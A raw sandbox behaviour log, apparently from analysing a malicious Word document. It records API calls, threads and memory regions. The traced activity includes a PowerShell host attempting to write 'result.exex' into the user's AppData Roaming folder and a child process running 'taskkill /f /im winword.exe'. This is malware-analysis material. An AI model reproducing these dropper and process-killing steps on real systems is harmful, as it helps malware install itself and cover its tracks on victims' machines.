[0083.681] GetUserNameW (in: lpBuffer=0x321ab0, pcbBuffer=0xcd608 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd608) returned 1
[0083.681] CoTaskMemFree (pv=0x321ab0)
[0083.682] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x31669c0*="Stopped", lpRawData=0x3166750) returned 1
[0083.683] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
[0083.684] CoGetContextToken (in: pToken=0xcf190 | out: pToken=0xcf190) returned 0x0
[0083.684] CObjectContext::QueryInterface () returned 0x0
[0083.684] CObjectContext::GetCurrentThreadType () returned 0x0
[0083.684] Release () returned 0x0
[0083.686] CoGetContextToken (in: pToken=0xced60 | out: pToken=0xced60) returned 0x0
[0083.686] CObjectContext::QueryInterface () returned 0x0
[0083.686] CObjectContext::GetCurrentThreadType () returned 0x0
[0083.686] Release () returned 0x0
[0083.687] CoGetContextToken (in: pToken=0xced60 | out: pToken=0xced60) returned 0x0
[0083.687] CObjectContext::QueryInterface () returned 0x0
[0083.687] CObjectContext::GetCurrentThreadType () returned 0x0
[0083.687] Release () returned 0x0
[0083.718] CoGetContextToken (in: pToken=0xced60 | out: pToken=0xced60) returned 0x0
[0083.718] CObjectContext::QueryInterface () returned 0x0
[0083.718] CObjectContext::GetCurrentThreadType () returned 0x0
[0083.718] Release () returned 0x0
[0083.738] CoGetContextToken (in: pToken=0xced50 | out: pToken=0xced50) returned 0x0
[0083.738] CObjectContext::QueryInterface () returned 0x0
[0083.738] CObjectContext::GetCurrentThreadType () returned 0x0
[0083.738] Release () returned 0x0
[0083.739] CoUninitialize ()
Thread:
id = 97
os_tid = 0x9a4
Thread:
id = 100
os_tid = 0x994
Thread:
id = 103
os_tid = 0x458
Thread:
id = 104
os_tid = 0xa60
Thread:
id = 105
os_tid = 0xb4
Thread:
id = 106
os_tid = 0x9cc
[0069.690] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0077.944] LocalFree (hMem=0x2d4630) returned 0x0
[0077.944] CloseHandle (hObject=0x31c) returned 1
[0077.944] CloseHandle (hObject=0x13) returned 1
[0077.980] CloseHandle (hObject=0xf) returned 1
[0077.980] RegCloseKey (hKey=0x308) returned 0x0
[0077.980] RegCloseKey (hKey=0x304) returned 0x0
[0077.980] RegCloseKey (hKey=0x300) returned 0x0
[0077.980] LocalFree (hMem=0x2d4600) returned 0x0
[0077.980] RegCloseKey (hKey=0x328) returned 0x0
[0080.948] RegCloseKey (hKey=0x36c) returned 0x0
[0080.948] RegCloseKey (hKey=0x368) returned 0x0
[0080.948] RegCloseKey (hKey=0x364) returned 0x0
[0080.948] RegCloseKey (hKey=0x360) returned 0x0
[0080.948] RegCloseKey (hKey=0x35c) returned 0x0
[0080.949] RegCloseKey (hKey=0x358) returned 0x0
[0080.949] RegCloseKey (hKey=0x354) returned 0x0
[0080.949] RegCloseKey (hKey=0x39c) returned 0x0
[0080.949] RegCloseKey (hKey=0x398) returned 0x0
[0080.949] RegCloseKey (hKey=0x344) returned 0x0
[0080.949] RegCloseKey (hKey=0x340) returned 0x0
[0080.949] RegCloseKey (hKey=0x33c) returned 0x0
[0080.950] RegCloseKey (hKey=0x338) returned 0x0
[0080.950] RegCloseKey (hKey=0x334) returned 0x0
[0080.950] RegCloseKey (hKey=0x330) returned 0x0
[0080.950] RegCloseKey (hKey=0x32c) returned 0x0
[0080.950] RegCloseKey (hKey=0x308) returned 0x0
[0080.950] RegCloseKey (hKey=0x304) returned 0x0
[0080.950] RegCloseKey (hKey=0x394) returned 0x0
[0080.950] RegCloseKey (hKey=0x390) returned 0x0
[0080.951] RegCloseKey (hKey=0x370) returned 0x0
[0080.951] RegCloseKey (hKey=0x3a4) returned 0x0
[0080.951] RegCloseKey (hKey=0x388) returned 0x0
[0080.951] RegCloseKey (hKey=0x384) returned 0x0
[0080.951] RegCloseKey (hKey=0x380) returned 0x0
[0080.951] RegCloseKey (hKey=0x37c) returned 0x0
[0080.952] RegCloseKey (hKey=0x378) returned 0x0
[0080.952] RegCloseKey (hKey=0x374) returned 0x0
[0080.952] RegCloseKey (hKey=0x350) returned 0x0
[0080.952] RegCloseKey (hKey=0x3a0) returned 0x0
[0080.952] RegCloseKey (hKey=0x300) returned 0x0
[0083.704] LocalFree (hMem=0x2c7ac0) returned 0x0
[0083.705] LocalFree (hMem=0x2c79b0) returned 0x0
[0083.718] DeregisterEventSource (hEventLog=0x1b900008) returned 1
[0083.734] RegCloseKey (hKey=0x308) returned 0x0
[0083.734] CloseHandle (hObject=0x304) returned 1
[0083.734] CloseHandle (hObject=0x394) returned 1
[0083.734] CloseHandle (hObject=0x390) returned 1
[0083.734] CloseHandle (hObject=0x370) returned 1
[0083.735] CloseHandle (hObject=0x3a4) returned 1
[0083.735] CloseHandle (hObject=0x388) returned 1
[0083.735] CloseHandle (hObject=0x384) returned 1
[0083.735] CloseHandle (hObject=0x380) returned 1
[0083.735] CloseHandle (hObject=0x37c) returned 1
[0083.735] CloseHandle (hObject=0x324) returned 1
[0083.736] CloseHandle (hObject=0x378) returned 1
[0083.736] CloseHandle (hObject=0x374) returned 1
[0083.736] RegCloseKey (hKey=0xffffffff80000004) returned 0x0
[0083.736] CloseHandle (hObject=0x350) returned 1
[0083.736] CloseHandle (hObject=0x2e8) returned 1
[0083.736] CloseHandle (hObject=0x318) returned 1
[0083.736] UnmapViewOfFile (lpBaseAddress=0x2ac0000) returned 1
[0083.737] CloseHandle (hObject=0x3a0) returned 1
Thread:
id = 107
os_tid = 0x92c
[0082.219] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0082.231] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
[0082.250] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.250] CoTaskMemFree (pv=0x1b822f80)
[0082.251] VirtualQuery (in: lpAddress=0x1c82de40, lpBuffer=0x1c82ed00, dwLength=0x30 | out: lpBuffer=0x1c82ed00*(BaseAddress=0x1c82d000, AllocationBase=0x1bea0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.279] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.279] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.279] CoTaskMemFree (pv=0x1b822f80)
[0082.281] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.281] CoTaskMemFree (pv=0x1b822f80)
[0082.283] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.283] CoTaskMemFree (pv=0x1b822f80)
[0082.318] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.318] CoTaskMemFree (pv=0x1b822f80)
[0082.322] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.322] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.322] CoTaskMemFree (pv=0x1b822f80)
[0082.323] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.323] CoTaskMemFree (pv=0x1b822f80)
[0082.341] VirtualQuery (in: lpAddress=0x1c82e0f0, lpBuffer=0x1c82efb0, dwLength=0x30 | out: lpBuffer=0x1c82efb0*(BaseAddress=0x1c82e000, AllocationBase=0x1bea0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.342] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.342] CoTaskMemFree (pv=0x1b822f80)
[0082.344] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.344] CoTaskMemFree (pv=0x1b822f80)
[0082.344] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.344] CoTaskMemFree (pv=0x1b822f80)
[0082.345] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.345] CoTaskMemFree (pv=0x1b822f80)
[0082.353] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.353] CoTaskMemFree (pv=0x1b822f80)
[0082.459] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.459] CoTaskMemFree (pv=0x1b822f80)
[0082.460] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.460] CoTaskMemFree (pv=0x1b822f80)
[0082.461] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.461] CoTaskMemFree (pv=0x1b822f80)
[0082.484] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.484] CoTaskMemFree (pv=0x1b822f80)
[0082.485] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.485] CoTaskMemFree (pv=0x1b822f80)
[0082.486] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.486] CoTaskMemFree (pv=0x1b822f80)
[0082.487] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.487] CoTaskMemFree (pv=0x1b822f80)
[0082.503] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.504] CoTaskMemFree (pv=0x1b822f80)
[0082.542] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.542] CoTaskMemFree (pv=0x1b822f80)
[0082.546] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.546] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x21
[0082.546] CoTaskMemFree (pv=0x1b822f80)
[0082.574] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.574] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x21
[0082.574] CoTaskMemFree (pv=0x1b822f80)
[0083.142] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex", nBufferLength=0x105, lpBuffer=0x1c82dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex", lpFilePart=0x0) returned 0x2d
[0083.142] SetErrorMode (uMode=0x1) returned 0x1
[0083.143] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\result.exex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff
[0083.184] SetErrorMode (uMode=0x1) returned 0x1
[0083.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c82b500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0083.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c82b450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0083.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c82b450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0083.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c82b450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0083.330] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0083.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0083.330] CoTaskMemFree (pv=0x1b822f80)
[0083.651] SetEvent (hEvent=0x388) returned 1
[0083.651] SetEvent (hEvent=0x37c) returned 1
[0083.651] SetEvent (hEvent=0x380) returned 1
[0083.651] SetEvent (hEvent=0x384) returned 1
[0083.651] SetEvent (hEvent=0x394) returned 1
[0083.651] SetEvent (hEvent=0x3a4) returned 1
[0083.651] SetEvent (hEvent=0x370) returned 1
[0083.651] SetEvent (hEvent=0x390) returned 1
[0083.651] SetEvent (hEvent=0x304) returned 1
[0083.652] CoUninitialize ()
Process:
id = "11"
image_name = "taskkill.exe"
filename = "c:\\windows\\system32\\taskkill.exe"
page_root = "0x3192c000"
os_pid = "0x5f4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "9"
os_parent_pid = "0x2ac"
cmd_line = "\"C:\\Windows\\system32\\taskkill.exe\" /f /im winword.exe"
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010989" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1966
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1967
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1968
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1969
start_va = 0x190000
end_va = 0x20ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1970
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1971
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1972
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1973
start_va = 0xff2a0000
end_va = 0xff2befff
entry_point = 0xff2a4290
region_type = mapped_file
name = "taskkill.exe"
filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe")
Region:
id = 1974
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1975
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1976
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 1977
start_va = 0x7fffffde000
end_va = 0x7fffffdefff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 1978
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1979
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1980
start_va = 0x50000
end_va = 0x56fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1981
start_va = 0x60000
end_va = 0x15ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 1982
start_va = 0x160000
end_va = 0x161fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 1983
start_va = 0x170000
end_va = 0x173fff
entry_point = 0x170000
region_type = mapped_file
name = "taskkill.exe.mui"
filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui")
Region:
id = 1984
start_va = 0x180000
end_va = 0x180fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1985
start_va = 0x210000
end_va = 0x276fff
entry_point = 0x210000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1986
start_va = 0x280000
end_va = 0x280fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 1987
start_va = 0x2b0000
end_va = 0x2bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 1988
start_va = 0x2c0000
end_va = 0x3bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1989
start_va = 0x3c0000
end_va = 0x547fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 1990
start_va = 0x550000
end_va = 0x6d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1991
start_va = 0x6e0000
end_va = 0x1adffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 1992
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1993
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1994
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1995
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1996
start_va = 0x7fee02f0000
end_va = 0x7fee0414fff
entry_point = 0x7fee02f0000
region_type = mapped_file
name = "dbghelp.dll"
filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll")
Region:
id = 1997
start_va = 0x7fef1d30000
end_va = 0x7fef1d7bfff
entry_point = 0x7fef1d30000
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 1998
start_va = 0x7fef9730000
end_va = 0x7fef9747fff
entry_point = 0x7fef9731010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 1999
start_va = 0x7fefbb00000
end_va = 0x7fefbb14fff
entry_point = 0x7fefbb00000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2000
start_va = 0x7fefbb20000
end_va = 0x7fefbb2bfff
entry_point = 0x7fefbb20000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 2001
start_va = 0x7fefbb30000
end_va = 0x7fefbb45fff
entry_point = 0x7fefbb30000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 2002
start_va = 0x7fefbec0000
end_va = 0x7fefbed0fff
entry_point = 0x7fefbec1070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2003
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2004
start_va = 0x7fefd540000
end_va = 0x7fefd562fff
entry_point = 0x7fefd541198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 2005
start_va = 0x7fefd5e0000
end_va = 0x7fefd5eafff
entry_point = 0x7fefd5e1030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 2006
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2007
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2008
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb41010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2009
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2010
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde73274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2011
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2012
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1e3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2013
start_va = 0x7fefe5f0000
end_va = 0x7fefe63cfff
entry_point = 0x7fefe5f1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2014
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2015
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe781e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2016
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff711064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2017
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2018
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2019
start_va = 0x7feff9c0000
end_va = 0x7feff9c7fff
entry_point = 0x7feff9c1504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2020
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9db03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2021
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffaba874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2022
start_va = 0x290000
end_va = 0x290fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 2023
start_va = 0x2a0000
end_va = 0x2a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002a0000"
filename = ""
Region:
id = 2024
start_va = 0x1b00000
end_va = 0x1b7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b00000"
filename = ""
Region:
id = 2025
start_va = 0x1b80000
end_va = 0x1c3ffff
entry_point = 0x1b80000
region_type = mapped_file
name = "kernelbase.dll.mui"
